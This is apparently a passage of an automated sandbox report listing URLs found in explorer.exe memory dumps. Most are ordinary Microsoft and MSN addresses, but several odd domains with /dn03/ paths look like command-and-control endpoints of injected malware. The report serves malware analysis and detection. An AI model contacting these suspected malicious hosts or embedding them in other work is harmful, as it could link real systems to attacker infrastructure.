Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sukhiclothing.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sukhiclothing.com/dn03/www.banditsolana.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sukhiclothing.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.top-dao.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.top-dao.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.top-dao.com/dn03/www.jasonnutter.golf
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.top-dao.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.verxop.xyz
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.verxop.xyz/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.verxop.xyz/dn03/www.cataclysmicgamingapparel.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.verxop.xyzReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivaness.club
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivaness.club/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivaness.club/dn03/www.w937xb.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivaness.clubReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.w937xb.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.w937xb.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.w937xb.com/dn03/www.servicepmgtl.world
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.w937xb.comReferer:
Source: explorer.exe, 00000014.00000003.2299538498.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1351724632.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSJM
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSZM
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSp
Source: explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/rT
Source: explorer.exe, 00000014.00000000.1348137626.000000000862F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
Source: explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
Source: explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/~T
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3086278814.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337843154.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
